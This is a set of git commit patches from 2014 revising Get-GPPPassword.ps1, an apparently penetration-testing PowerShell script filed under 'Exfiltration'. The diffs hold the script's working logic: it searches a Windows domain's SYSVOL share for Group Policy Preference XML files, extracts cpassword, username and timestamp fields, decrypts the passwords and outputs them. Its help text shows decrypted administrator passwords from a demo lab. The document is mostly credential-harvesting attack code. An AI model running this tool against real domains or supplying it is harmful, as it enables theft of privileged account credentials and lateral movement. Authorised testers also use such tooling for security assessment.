From 261aaf6302ae590bc4632ee4c95042c2ed1a8a8c Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 15:09:43 -0500 Subject: Update Get-GPPPassword.ps1 Bug fix of variables. --- Exfiltration/Get-GPPPassword.ps1 | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 19959ed..d204197 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.0 + Version: 2.3.1 .DESCRIPTION @@ -124,10 +124,10 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'User'} else {$Replace = "User[$Number]"} - $Cpassword += , $Xml.Groups.User[$Number].Properties.cpassword - $UserName += , $Xml.Groups.User[$Number].Properties.userName - $NewName += , $Xml.Groups.User[$Number].Properties.newName - $Changed += , $Xml.Groups.User[$Number].changed + $Cpassword += , $Xml.Groups.User.$Replace.Properties.cpassword + $UserName += , $Xml.Groups.User.$Replace.Properties.userName + $NewName += , $Xml.Groups.User.$Replace.Properties.newName + $Changed += , $Xml.Groups.User.$Replace.changed } } @@ -136,9 +136,9 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'NTService'} else {$Replace = "NTService[$Number]"} - $Cpassword += , $Xml.NTServices.NTService[$Number].Properties.cpassword - $UserName += , $Xml.NTServices.NTService[$Number].Properties.accountName - $Changed += , $Xml.NTServices.NTService[$Number].changed + $Cpassword += , $Xml.NTServices.NTService.$Replace.Properties.cpassword + $UserName += , $Xml.NTServices.NTService.$Replace.Properties.accountName + $Changed += , $Xml.NTServices.NTService.$Replace.changed } } @@ -147,9 +147,9 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'Task'} else {$Replace = "Task[$Number]"} - $Cpassword += , $Xml.ScheduledTasks.Task[$Number].Properties.cpassword - $UserName += , $Xml.ScheduledTasks.Task[$Number].Properties.runAs - $Changed += , $Xml.ScheduledTasks.Task[$Number].changed + $Cpassword += , $Xml.ScheduledTasks.Task.$Replace.Properties.cpassword + $UserName += , $Xml.ScheduledTasks.Task.$Replace.Properties.runAs + $Changed += , $Xml.ScheduledTasks.Task.$Replace.changed } } @@ -217,4 +217,4 @@ function Get-GPPPassword { } catch {Write-Error $Error[0]} -} \ No newline at end of file +} -- cgit v1.2.3 From 313d80373cdfcb769d56eb396bf5c016b2f1b859 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 15:19:55 -0500 Subject: Update Get-GPPPassword.ps1 --- Exfiltration/Get-GPPPassword.ps1 | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index d204197..3c1b4da 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.1 + Version: 2.3.0 .DESCRIPTION @@ -124,10 +124,10 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'User'} else {$Replace = "User[$Number]"} - $Cpassword += , $Xml.Groups.User.$Replace.Properties.cpassword - $UserName += , $Xml.Groups.User.$Replace.Properties.userName - $NewName += , $Xml.Groups.User.$Replace.Properties.newName - $Changed += , $Xml.Groups.User.$Replace.changed + $Cpassword += , $Xml.Groups.$Replace.Properties.cpassword + $UserName += , $Xml.Groups.$Replace.Properties.userName + $NewName += , $Xml.Groups.$Replace.Properties.newName + $Changed += , $Xml.Groups.$Replace.changed } } -- cgit v1.2.3 From 770fe8ff109a1eaa10da9fb677b634c0dbc8a682 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 15:26:49 -0500 Subject: Update Get-GPPPassword.ps1 Iterate version. --- Exfiltration/Get-GPPPassword.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 3c1b4da..927712b 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.0 + Version: 2.3.1 .DESCRIPTION -- cgit v1.2.3 From 22572d6e7dd6a9aa88f9703cb80ac8cc425ff9e9 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 22:33:27 -0500 Subject: Changed the direction of XML parsing Used Select-XML to ensure compatibility with v2 --- Exfiltration/Get-GPPPassword.ps1 | 133 +++++++++++++++++++-------------------- 1 file changed, 63 insertions(+), 70 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 927712b..4c83b31 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -19,29 +19,41 @@ function Get-GPPPassword { PS C:\> Get-GPPPassword - Password : {password12} - Changed : {2014-02-21 05:28:53} - UserName : {test1} - NewName : {} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources - - Password : {Recycling*3ftw!, password123, password1234} - Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} - UserName : {Administrator (built-in), DummyAccount, dummy2} - NewName : {mspresenters, $null, $null} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups - - Password : {password, password1234$} - Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} - UserName : {administrator, admin} - NewName : {} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks - - Password : {password, read123} - Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} - UserName : {DEMO\Administrator, admin} - NewName : {} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services + NewName : {} + Changed : {2014-02-21 05:28:53} + Passwords : {password12} + UserNames : {test1} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml + + NewName : {mspresenters} + Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} + Passwords : {Recycling*3ftw!, password123, password1234} + UserNames : {Administrator (built-in), DummyAccount, dummy2} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml + + NewName : {} + Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} + Passwords : {password, password1234$} + UserNames : {administrator, admin} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml + + NewName : {} + Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} + Passwords : {password, read123} + UserNames : {DEMO\Administrator, admin} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml + +.EXAMPLE + + PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq + + password + password12 + password123 + password1234 + password1234$ + read123 + Recycling*3ftw! .LINK @@ -54,6 +66,9 @@ function Get-GPPPassword { [CmdletBinding()] Param () + #Some XML issues between versions + Set-StrictMode -Version 2 + #define helper function that decodes and decrypts password function Get-DecryptedCpassword { [CmdletBinding()] @@ -102,7 +117,6 @@ function Get-GPPPassword { #$FileObject = Get-ChildItem $File $Filename = Split-Path $File -Leaf - $Filepath = Split-Path $File -Parent [xml] $Xml = Get-Content ($File) #declare empty arrays @@ -120,48 +134,28 @@ function Get-GPPPassword { switch ($Filename) { 'Groups.xml' { - $Count = $Xml.Groups.User.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) {$Replace = 'User'} else {$Replace = "User[$Number]"} - $Cpassword += , $Xml.Groups.$Replace.Properties.cpassword - $UserName += , $Xml.Groups.$Replace.Properties.userName - $NewName += , $Xml.Groups.$Replace.Properties.newName - $Changed += , $Xml.Groups.$Replace.changed - } + $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - 'Services.xml' { - $Count = $Xml.NTServices.NTService.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) {$Replace = 'NTService'} else {$Replace = "NTService[$Number]"} - $Cpassword += , $Xml.NTServices.NTService.$Replace.Properties.cpassword - $UserName += , $Xml.NTServices.NTService.$Replace.Properties.accountName - $Changed += , $Xml.NTServices.NTService.$Replace.changed - } + 'Services.xml' { + $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } 'Scheduledtasks.xml' { - $Count = $Xml.ScheduledTasks.Task.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) {$Replace = 'Task'} else {$Replace = "Task[$Number]"} - $Cpassword += , $Xml.ScheduledTasks.Task.$Replace.Properties.cpassword - $UserName += , $Xml.ScheduledTasks.Task.$Replace.Properties.runAs - $Changed += , $Xml.ScheduledTasks.Task.$Replace.changed - } + $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - 'DataSources.xml' { - $Count = $Xml.DataSources.DataSource.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) {$Replace = 'DataSource'} else {$Replace = "DataSource[$Number]"} - $Cpassword += , $Xml.DataSources.$Replace.Properties.cpassword - $UserName += , $Xml.DataSources.$Replace.Properties.username - $Changed += , $Xml.DataSources.$Replace.changed - } + 'DataSources.xml' { + $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } } } @@ -173,28 +167,31 @@ function Get-GPPPassword { #append any new passwords to array $Password += , $DecryptedPassword } + + #put [BLANK] in variables + if (!($Password)) {$Password = '[BLANK]'} + if (!($UserName)) {$UserName = '[BLANK]'} + if (!($Changed)) {$Changed = '[BLANK]'} + if (!($NewName)) {$NewName = '[BLANK]'} #Create custom object to output results $ObjectProperties = @{'Passwords' = $Password; 'UserNames' = $UserName; 'Changed' = $Changed; 'NewName' = $NewName; - 'File' = $Filepath} + 'File' = $File} $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties Write-Verbose "The password is between {} and may be more than one value." - Return $ResultsObject - + if ($ResultsObject) {Return $ResultsObject} } catch {Write-Error $Error[0]} - } try { #ensure that machine is domain joined and script is running as a domain account - if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) - { + if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { throw 'Machine is not a domain member or User is not a member of the domain.' } @@ -202,15 +199,11 @@ function Get-GPPPassword { Write-Verbose 'Searching the DC. This could take a while.' $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml' - if ( -not $XMlFiles ) - { - throw 'No preference files found.' - } + if ( -not $XMlFiles ) {throw 'No preference files found.'} Write-Verbose "Found $($XMLFiles.Count) files that could contain passwords." foreach ($File in $XMLFiles) { - $Result = (Get-GppInnerFields $File.Fullname) Write-Output $Result } -- cgit v1.2.3 From 7ee66855f300bcf32dc12226bcb30acb46cb9972 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 22:34:11 -0500 Subject: Update Get-GPPPassword.ps1 --- Exfiltration/Get-GPPPassword.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 4c83b31..3ec20f2 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.1 + Version: 2.3.2 .DESCRIPTION -- cgit v1.2.3 From 3047ccfe3290d4000e769be9767399b53a6fb111 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 22:37:23 -0500 Subject: Update Get-GPPPassword.ps1 --- Exfiltration/Get-GPPPassword.ps1 | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 3ec20f2..454e276 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -19,7 +19,7 @@ function Get-GPPPassword { PS C:\> Get-GPPPassword - NewName : {} + NewName : [BLANK] Changed : {2014-02-21 05:28:53} Passwords : {password12} UserNames : {test1} @@ -31,13 +31,13 @@ function Get-GPPPassword { UserNames : {Administrator (built-in), DummyAccount, dummy2} File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml - NewName : {} + NewName : [BLANK] Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} Passwords : {password, password1234$} UserNames : {administrator, admin} File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml - NewName : {} + NewName : [BLANK] Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} Passwords : {password, read123} UserNames : {DEMO\Administrator, admin} -- cgit v1.2.3